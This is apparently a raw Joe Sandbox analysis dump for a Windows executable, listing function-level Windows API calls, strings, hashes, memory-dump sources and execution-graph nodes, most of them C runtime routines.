                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
                                                              • Instruction ID: dc7fb6c9b439329b3f1eebeaee82eec497c0604bf2e99167f223d5535a857021
                                                              • Opcode Fuzzy Hash: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
                                                              • Instruction Fuzzy Hash: 72214C21E5C24342FB68E721965917D61A29F8C7F8F184734E93EC6AF6FE2CA441C701
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                              • Instruction ID: 7b53d6fa7f3dbf827f2a487b1539fd8aa51851257c78a003142cb659cb094a80
                                                              • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                              • Instruction Fuzzy Hash: DE115121A18A4786E7609B56E958339A2A0FB9CBE4F045234EA6EC77F4EF7CD414C740
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E821D
                                                              • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E827A
                                                                • Part of subcall function 00007FF6FB1E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6FB1E3FA4,00000000,00007FF6FB1E1925), ref: 00007FF6FB1E86E9
                                                              • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E8305
                                                              • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E8364
                                                              • FreeLibrary.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E8375
                                                              • FreeLibrary.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E838A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                              • String ID:
                                                              • API String ID: 3462794448-0
                                                              • Opcode ID: 639de59220823cace7c77af6f37b7d772b01f3b75ea0781fa3cc2fa807537d27
                                                              • Instruction ID: 15b841edd0ea822cfbb58ef6fca21af6a6028b9fa1b58d3e308299b92fd91964
                                                              • Opcode Fuzzy Hash: 639de59220823cace7c77af6f37b7d772b01f3b75ea0781fa3cc2fa807537d27
                                                              • Instruction Fuzzy Hash: 7C415E62E19A8381EB70DB11A5442AE6394FB8DBC8F444135DF6D97BE9EE3CE501C700
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA5E7
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA61D
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA64A
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA65B
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA66C
                                                              • SetLastError.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA687
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                              • Instruction ID: db631e8db13fb1a6b3ccbb68a75881381014553465a5cd4151cc284b9ed3eefa
                                                              • Opcode Fuzzy Hash: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                              • Instruction Fuzzy Hash: 86114A21E5C24342FB58E7619A5917D22A25F8C7B8F045734D83EC66F6FE2CB801C701
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                              • String ID: Unhandled exception in script
                                                              • API String ID: 3081866767-2699770090
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: Message$ByteCharMultiWide
                                                              • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                              • API String ID: 1878133881-640379615
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              APIs
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              APIs
                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA6BF
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA6DE
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA706
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA717
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA728
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              APIs
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: verbose
                                                              • API String ID: 3215553584-579935070
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                              • API String ID: 3215553584-1196891531
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 2395640692-1018135373
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              APIs
                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF6FB1E324C,?,?,00007FF6FB1E3964), ref: 00007FF6FB1E7642
                                                              Strings
                                                              Similarity
                                                              • API ID: CreateDirectory
                                                              • String ID: %.*s$%s%c$\
                                                              • API String ID: 4241100979-1685191245
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: Message$ByteCharMultiWide
                                                              • String ID: Error/warning (ANSI fallback)$Warning
                                                              • API String ID: 1878133881-2698358428
                                                              • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                              • Instruction ID: 3ed3cb0239aaeb0ff4cb6b4e2db05f74bcbd9ad01f1ac0e3bf737689f830a1be
                                                              • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                              • Instruction Fuzzy Hash: 18118172A28A4681EB20DB10F565BAD3364FB48B88F501135DA6D876A4EF3CE605C740
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: Message$ByteCharMultiWide
                                                              • String ID: Error$Error/warning (ANSI fallback)
                                                              • API String ID: 1878133881-653037927
                                                              • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                              • Instruction ID: 36a2b72a220d63366705eaaa16e71de296a558917ac96bff469b69b89cc2150d
                                                              • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                              • Instruction Fuzzy Hash: 9F118E72A28A8681EB20DB00F565BAD6364FB4CBC8F901135DA6D876A4EF3CE605C740
                                                              APIs
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                              • Instruction ID: e1affca7c548a8535667676dbf827b4e72c6a21703a0f50ba228eded790927d1
                                                              • Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                              • Instruction Fuzzy Hash: C3D1D176F08A8289E721CF69D5402AD37B1FB487D8B144235CE6E97BE9EE38D516C300
                                                              APIs
                                                              Similarity
                                                              • API ID: _get_daylight$_isindst
                                                              • String ID:
                                                              • API String ID: 4170891091-0
                                                              • Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                              • Instruction ID: f31c59562f08633a2d07bf4b1870bca487197d7c11490e07d701de2be24666c6
                                                              • Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                              • Instruction Fuzzy Hash: 8A51E573F041138AEB14DF64A9956BD27A2AB5839DF540135DD2ED2AF6EF38A501C700
                                                              APIs
                                                              Similarity
                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                              • String ID:
                                                              • API String ID: 2780335769-0
                                                              • Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                              • Instruction ID: 4ec867d2007e2f41d018b0819f3d7f61bae324759b9f82f4574747d48d87c50b
                                                              • Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                              • Instruction Fuzzy Hash: 35516822E086428AFB24DF7194503BD23A1AF4CB9CF149535DE29C76A9EF38D5A1C740
                                                              APIs
                                                              Similarity
                                                              • API ID: LongWindow$DialogInvalidateRect
                                                              • String ID:
                                                              • API String ID: 1956198572-0
                                                              • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                              • Instruction ID: 59bb9a2abd7cb7dc067461ba02fc92d881dd4d05ad8528567b615fd358c1a378
                                                              • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                              • Instruction Fuzzy Hash: 1A11C631E0814342FB64EB6AE55827D1291EF8CBC4F949031DA6987FEAED2CF4C18640
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                              • String ID: ?
                                                              • API String ID: 1286766494-1684325040
                                                              • Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                              • Instruction ID: 11d8f06991529424cd6897463360c2c90a14e325b5a542a2007728b21feedea8
                                                              • Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                              • Instruction Fuzzy Hash: 88412A12A0828345FB249B25D5253795660EF987E4F109235EE7CC6AF5FF3CD541C700
                                                              APIs
                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB1F835E
                                                                • Part of subcall function 00007FF6FB1F9C58: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C6E
                                                                • Part of subcall function 00007FF6FB1F9C58: GetLastError.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C78
                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6FB1EBEC5), ref: 00007FF6FB1F837C
                                                              Strings
                                                              Similarity
                                                              • API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
                                                              • String ID: C:\Users\user\Desktop\e45AiBoV6X.exe
                                                              • API String ID: 2553983749-3551109972
                                                              • Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                              • Instruction ID: 10b7e5f03b503dde526c9d0b3b79f6bc87970166dcc8d70c70fc678bf12099f0
                                                              • Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                              • Instruction Fuzzy Hash: C0416C36E08A53C5EB18DF25E9811BC27A4EB497D8B555035EA6EC7BE5EE3CE481C300
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                              • String ID: .$:
                                                              • API String ID: 2020911589-4202072812
                                                              • Opcode ID: a7e7ecf8ca197d948e5de4d949c192756b769c590a90378fa45037ccdac380fb
                                                              • Instruction ID: 751dcc1dd1b5525232542b870e70bda81a8fe4585af1ea3eb1b8886e7e3f7060
                                                              • Opcode Fuzzy Hash: a7e7ecf8ca197d948e5de4d949c192756b769c590a90378fa45037ccdac380fb
                                                              • Instruction Fuzzy Hash: EA414A22E0965398FB10DBA198611BC27B4BF1875CF540039EE6DA7AE9EF78A456C300
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                              • Instruction ID: 8578bb5448fca6d6b7ca3f789977a7d2209c012eeacf791fba62aa5c6ae5ebc4
                                                              • Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                              • Instruction Fuzzy Hash: 8541B322A18A8681DB20DF25E4447BA6760FB8C798F944131EE5DC7BE8EF3CD441CB40
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID: :
                                                              • API String ID: 1611563598-336475711
                                                              • Opcode ID: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                              • Instruction ID: 1f03d44e165032d7eeec944408b60b3d3521c9fa64b7f28c6c1d81e73b34da24
                                                              • Opcode Fuzzy Hash: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                              • Instruction Fuzzy Hash: E921B123A0868381EB60DB15D04427E73A1FBCCB88F854035D6AD836E8EF7CE545C751
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                              • Instruction ID: 0d81c36123044be23eced6fa8f0323cd471005690991adf5f33c967407c1c9f3
                                                              • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                              • Instruction Fuzzy Hash: A0114C36A18B4582EB218B15E54026D77E1FB88B98F184231DE9D47BA4EF3DE551C700
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                              • String ID: :
                                                              • API String ID: 2595371189-336475711
                                                              • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                              • Instruction ID: 5efa9ca9b9e8c2a2314436d27ea6877620663d8825c206dae8e1fdef55b359fa
                                                              • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                              • Instruction Fuzzy Hash: 93017822E1864786EB30EB60946127E63A0EF4C74CF841036D56DC26E1FEACE555CA14

                                                              Execution Graph

                                                              Execution Coverage: 1.6%
                                                              Dynamic/Decrypted Code Coverage: 0%
                                                              Signature Coverage: 1.3%
                                                              Total number of Nodes: 630
                                                              Total number of Limit Nodes: 20
37 API calls 87834->87835 88033 7ff6fb1efdfc 87834->88033 87835->87834 87837 7ff6fb1ef39c 87836->87837 88057 7ff6fb1ef148 87837->88057 87839 7ff6fb1ef3b5 87839->87775 87840->87765 87841->87777 87842->87777 88069 7ff6fb1ef6dc 87843->88069 87846->87777 87848 7ff6fb1e86d2 MultiByteToWideChar 87847->87848 87850 7ff6fb1e86f6 87847->87850 87848->87850 87851 7ff6fb1e870c __std_exception_copy 87848->87851 87849 7ff6fb1e8713 MultiByteToWideChar 87849->87851 87850->87849 87850->87851 87851->87807 87853 7ff6fb1f51d8 87852->87853 87854 7ff6fb1f51fe 87853->87854 87857 7ff6fb1f5231 87853->87857 87883 7ff6fb1f43f4 11 API calls _get_daylight 87854->87883 87856 7ff6fb1f5203 87884 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 87856->87884 87859 7ff6fb1f5244 87857->87859 87860 7ff6fb1f5237 87857->87860 87871 7ff6fb1f9f38 87859->87871 87885 7ff6fb1f43f4 11 API calls _get_daylight 87860->87885 87864 7ff6fb1e3fc6 87864->87812 87865 7ff6fb1f5265 87878 7ff6fb1ff1dc 87865->87878 87866 7ff6fb1f5258 87886 7ff6fb1f43f4 11 API calls _get_daylight 87866->87886 87869 7ff6fb1f5278 87887 7ff6fb1f4788 LeaveCriticalSection 87869->87887 87888 7ff6fb1ff5e8 EnterCriticalSection 87871->87888 87873 7ff6fb1f9f4f 87874 7ff6fb1f9fac 19 API calls 87873->87874 87875 7ff6fb1f9f5a 87874->87875 87876 7ff6fb1ff648 _isindst LeaveCriticalSection 87875->87876 87877 7ff6fb1f524e 87876->87877 87877->87865 87877->87866 87889 7ff6fb1feed8 87878->87889 87882 7ff6fb1ff236 87882->87869 87883->87856 87884->87864 87885->87864 87886->87864 87890 7ff6fb1fef13 __vcrt_InitializeCriticalSectionEx 87889->87890 87899 7ff6fb1ff0da 87890->87899 87904 7ff6fb1f6d4c 51 API calls 3 library calls 87890->87904 87892 7ff6fb1ff1b1 87908 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 87892->87908 87894 7ff6fb1ff0e3 87894->87882 87901 7ff6fb206064 87894->87901 87896 7ff6fb1ff145 87896->87899 87905 7ff6fb1f6d4c 51 API calls 3 library calls 87896->87905 87898 7ff6fb1ff164 87898->87899 87906 7ff6fb1f6d4c 51 API calls 3 library calls 
87898->87906 87899->87894 87907 7ff6fb1f43f4 11 API calls _get_daylight 87899->87907 87909 7ff6fb205664 87901->87909 87904->87896 87905->87898 87906->87899 87907->87892 87908->87894 87910 7ff6fb20567b 87909->87910 87914 7ff6fb205699 87909->87914 87963 7ff6fb1f43f4 11 API calls _get_daylight 87910->87963 87912 7ff6fb205680 87964 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 87912->87964 87913 7ff6fb2056b5 87920 7ff6fb205c74 87913->87920 87914->87910 87914->87913 87918 7ff6fb20568c 87918->87882 87966 7ff6fb2059a8 87920->87966 87923 7ff6fb205d01 87986 7ff6fb1f7830 87923->87986 87924 7ff6fb205ce9 87998 7ff6fb1f43d4 11 API calls _get_daylight 87924->87998 87927 7ff6fb205cee 87999 7ff6fb1f43f4 11 API calls _get_daylight 87927->87999 87957 7ff6fb2056e0 87957->87918 87965 7ff6fb1f7808 LeaveCriticalSection 87957->87965 87963->87912 87964->87918 87967 7ff6fb2059d4 87966->87967 87968 7ff6fb2059ee 87966->87968 87967->87968 88011 7ff6fb1f43f4 11 API calls _get_daylight 87967->88011 87971 7ff6fb205a6c 87968->87971 88013 7ff6fb1f43f4 11 API calls _get_daylight 87968->88013 87970 7ff6fb2059e3 88012 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 87970->88012 87973 7ff6fb205abd 87971->87973 88015 7ff6fb1f43f4 11 API calls _get_daylight 87971->88015 87984 7ff6fb205b1a 87973->87984 88017 7ff6fb1f8e90 37 API calls 2 library calls 87973->88017 87976 7ff6fb205b16 87979 7ff6fb205b98 87976->87979 87976->87984 87978 7ff6fb205ab2 88016 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 87978->88016 88018 7ff6fb1f9c10 17 API calls __GetCurrentState 87979->88018 87980 7ff6fb205a61 88014 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 87980->88014 87984->87923 87984->87924 88019 7ff6fb1ff5e8 EnterCriticalSection 87986->88019 87998->87927 87999->87957 88011->87970 88012->87968 88013->87980 88014->87971 88015->87978 88016->87973 88017->87976 88021 7ff6fb1ef7ee 88020->88021 88022 7ff6fb1ef7ae 88020->88022 88021->88022 88024 7ff6fb1ef7fa 88021->88024 88032 7ff6fb1f9b24 37 API calls 
2 library calls 88022->88032 88031 7ff6fb1f477c EnterCriticalSection 88024->88031 88026 7ff6fb1ef7d5 88026->87817 88027 7ff6fb1ef7ff 88028 7ff6fb1ef908 71 API calls 88027->88028 88029 7ff6fb1ef811 88028->88029 88030 7ff6fb1f4788 _fread_nolock LeaveCriticalSection 88029->88030 88030->88026 88032->88026 88034 7ff6fb1efe2c 88033->88034 88041 7ff6fb1efb4c 88034->88041 88036 7ff6fb1efe4a 88036->87834 88037->87823 88038->87830 88039->87830 88040->87830 88042 7ff6fb1efb6c 88041->88042 88043 7ff6fb1efb99 88041->88043 88042->88043 88044 7ff6fb1efba1 88042->88044 88045 7ff6fb1efb76 88042->88045 88043->88036 88048 7ff6fb1efa8c 88044->88048 88055 7ff6fb1f9b24 37 API calls 2 library calls 88045->88055 88056 7ff6fb1f477c EnterCriticalSection 88048->88056 88050 7ff6fb1efaa9 88051 7ff6fb1efacc 74 API calls 88050->88051 88052 7ff6fb1efab2 88051->88052 88053 7ff6fb1f4788 _fread_nolock LeaveCriticalSection 88052->88053 88054 7ff6fb1efabd 88053->88054 88054->88043 88055->88043 88058 7ff6fb1ef163 88057->88058 88059 7ff6fb1ef191 88057->88059 88068 7ff6fb1f9b24 37 API calls 2 library calls 88058->88068 88066 7ff6fb1ef183 88059->88066 88067 7ff6fb1f477c EnterCriticalSection 88059->88067 88062 7ff6fb1ef1a8 88063 7ff6fb1ef1c4 72 API calls 88062->88063 88064 7ff6fb1ef1b4 88063->88064 88065 7ff6fb1f4788 _fread_nolock LeaveCriticalSection 88064->88065 88065->88066 88066->87839 88068->88066 88070 7ff6fb1ef6d4 88069->88070 88071 7ff6fb1ef706 88069->88071 88070->87779 88071->88070 88072 7ff6fb1ef715 memcpy_s 88071->88072 88073 7ff6fb1ef752 88071->88073 88083 7ff6fb1f43f4 11 API calls _get_daylight 88072->88083 88082 7ff6fb1f477c EnterCriticalSection 88073->88082 88076 7ff6fb1ef75a 88078 7ff6fb1ef45c _fread_nolock 51 API calls 88076->88078 88077 7ff6fb1ef72a 88084 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 88077->88084 88080 7ff6fb1ef771 88078->88080 88081 7ff6fb1f4788 _fread_nolock LeaveCriticalSection 88080->88081 88081->88070 88083->88077 88084->88070 88089 7ff6fb1f3cfe 88085->88089 
88086 7ff6fb1f3d23 88103 7ff6fb1f9b24 37 API calls 2 library calls 88086->88103 88088 7ff6fb1f3d5f 88104 7ff6fb1f1f30 49 API calls _invalid_parameter_noinfo 88088->88104 88089->88086 88089->88088 88091 7ff6fb1f3df6 88095 7ff6fb1f3e08 88091->88095 88097 7ff6fb1f3e3c 88091->88097 88098 7ff6fb1f3e60 88091->88098 88099 7ff6fb1f3e11 88091->88099 88092 7ff6fb1f3d4d 88093 7ff6fb1eb870 _log10_special 8 API calls 88092->88093 88096 7ff6fb1e1c38 88093->88096 88095->88097 88095->88099 88096->87746 88107 7ff6fb1f9c58 11 API calls 2 library calls 88097->88107 88098->88097 88100 7ff6fb1f3e6a 88098->88100 88105 7ff6fb1f9c58 11 API calls 2 library calls 88099->88105 88106 7ff6fb1f9c58 11 API calls 2 library calls 88100->88106 88103->88092 88104->88091 88105->88092 88106->88092 88107->88092 88108->87794 88110 7ff6fb1ebf5c 88131 7ff6fb1ec12c 88110->88131 88113 7ff6fb1ec0a8 88250 7ff6fb1ec44c 7 API calls 2 library calls 88113->88250 88114 7ff6fb1ebf78 __scrt_acquire_startup_lock 88116 7ff6fb1ec0b2 88114->88116 88123 7ff6fb1ebf96 __scrt_release_startup_lock 88114->88123 88251 7ff6fb1ec44c 7 API calls 2 library calls 88116->88251 88118 7ff6fb1ebfbb 88119 7ff6fb1ec0bd __GetCurrentState 88120 7ff6fb1ec041 88137 7ff6fb1ec594 88120->88137 88122 7ff6fb1ec046 88140 7ff6fb1e1000 88122->88140 88123->88118 88123->88120 88247 7ff6fb1f8e44 45 API calls 88123->88247 88128 7ff6fb1ec069 88128->88119 88249 7ff6fb1ec2b0 7 API calls 88128->88249 88130 7ff6fb1ec080 88130->88118 88132 7ff6fb1ec134 88131->88132 88133 7ff6fb1ec140 __scrt_dllmain_crt_thread_attach 88132->88133 88134 7ff6fb1ebf70 